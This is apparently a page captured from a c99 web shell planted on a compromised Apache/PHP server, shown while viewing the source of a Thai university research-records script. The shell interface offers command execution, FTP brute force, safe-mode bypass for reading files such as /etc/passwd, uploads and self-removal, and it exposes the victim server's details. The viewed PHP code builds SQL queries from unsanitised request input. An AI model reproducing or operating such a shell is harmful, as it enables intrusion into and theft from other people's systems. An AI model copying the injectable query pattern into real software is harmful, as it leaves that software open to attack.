!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/Research_depart/   drwxr-xr-x
Free 52.62 GB of 127.8 GB (41.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     PersonalResearch.php (15.04 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
";
		echo "

กรุณาทำการ Login ก่อน
";
		echo "";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../include/Function.php" );
		
		/**  Chart  */
		include ("../includes/charts.php");
		
		/**  Create Database Object  */
		$dbObj = new DBConn;


			  $sql3 = "Select *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId Where Teacher_code='$Teacher_code'";
 			 $result2= mysql_query($sql3);
			 $rss = mysql_fetch_array($result2);
	
		/**  Create Database Object  */
		$dbObj = new DBConn;

		/**  Config Table for This Page  */
		$myTable = "personal_tb";
		
		$myOrderBy = "Teacher_id";
		
		$myTableField1 = "Teacher_id";    
		$myTableField2 = "Teacher_name";
		$myTableField3 = "Teacher_lastname";
	

		/**  Parameters  */
		$params = "";
		
		
		/**  Paging */
		$page = $_GET['page'];
		if( $page == "" ) { $page = 1; }
			
		/**  จำนวนข้อมูล ต่อ 1 หน้า  */
		$perpage = $_REQUEST['perpage'];
		if( $perpage == "" ) { $perpage = 20; }
		

	} # else
 ?>






ข้อมูลงานวิจัยแยกตามรายบุคคล







  

    
    
    execQuery($query);
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		if( isset($_GET['OrderBy']) ) {
			if( $keyword != "" ) { // ใส่ Keyword
				$query = "SELECT *, prefixName as First_name FROM personal_tb 
							LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId 
							LEFT JOIN research_char_tb ON personal_tb.Teacher_code = research_char_tb.Teacher_code 
							WHERE ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%') 
							ORDER BY  $OrderBy  $ASCDESC ";
			} else {
				$query = "SELECT *, prefixName as First_name FROM personal_tb 
							LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId 
							LEFT JOIN research_char_tb ON personal_tb.Teacher_code = research_char_tb.Teacher_code 
							group by  personal_tb.Teacher_code  
							ORDER BY  personal_tb.$OrderBy  $ASCDESC ";
			}
		} 
		elseif( !isset($_GET['OrderBy']) ) {
			if( $keyword != "" ) { // ใส่ Keyword
				$query = "SELECT *, prefixName as First_name FROM personal_tb 
							LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId 
							LEFT JOIN research_char_tb ON personal_tb.Teacher_code = research_char_tb.Teacher_code 
							WHERE ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%'   ) 
							ORDER BY  personal_tb.$myOrderBy  ASC ";
			} else {
				$query = "SELECT *, prefixName as First_name FROM personal_tb
							LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId 
							LEFT JOIN research_char_tb ON personal_tb.Teacher_code = research_char_tb.Teacher_code 
							group by personal_tb.Teacher_code 
							ORDER BY personal_tb.$myOrderBy  ASC ";
			}
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
		
    ?>
    

     

      

      

        
      

      

        หน้าหลัก » ข้อมูลงานวิจัยจำแนกตามปีการศึกษา » ข้อมูลงานวิจัยจำแนกตามรายบุคคล
        

      

         
      

      

        
      	

          

             
            ข้อมูลต่อหน้า
              
          

          

           0 ) { ?>
           
          fetchArray($result) ) { 
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
				
				if( $keyword != "" ) {
					$Name = eregi_replace( $keyword, "\\0", $rs['Name'] );
					$Lastname = eregi_replace( $keyword, "\\0", $rs['Lastname'] );
					$Degree = eregi_replace( $keyword, "\\0", $rs['Degree'] );
					$Skill = eregi_replace( $keyword, "\\0", $rs['Skill'] );
					$Addr_work = eregi_replace( $keyword, "\\0", $rs['Addr_work'] );
				} else {
					$Name = $rs['Name'];
					$Lastname = $rs['Lastname'];
					$Degree = $rs['Degree'];
					$Skill = $rs['Skill'];
					$Addr_work = $rs['Addr_work'];
				}
				
				$Teacher_code = $rs[Teacher_code];
				$sql2 ="Select count(Teacher_code) as countR From research_char_tb Where Teacher_code='$Teacher_code'";
				$result4 = mysql_query($sql2);
				//  $count = mysql_num_rows(result3);
				$row2 = mysql_fetch_array($result4);
				$countR = $row2[countR];
				
					if($countR != 0){
          ?>
            

            

              No
              รหัสอาจารย์
              
                  
                  
                  
                  
                ชื่อ-นามสกุล
              สังกัดกลุ่มฝ่าย
              จำนวนผลงานวิจัย
              

            

              
              
               ">  
               
              
              

            
          

          

        

          
           0 ) { ?>
          

            

                
            

            

                หน้า: 
                     1) {	
                            $previous = $display - 1;					

                    ?>
bool(false)




:: Command execute ::


Enter:  
Select: 
 






:: Shadow's tricks :D  ::



  

    
Useful Commands 
    

    

      

        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 

    

    

  

   
Kernel Info: 

      
      
	  
	  
	  
	  
    

    







:: Preddy's tricks :D  ::



  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      

    

    

  

   
Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    

    








 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ ok ]






:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]


:: Go Dir ::
 
:: Go File ::
 


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0062 ]--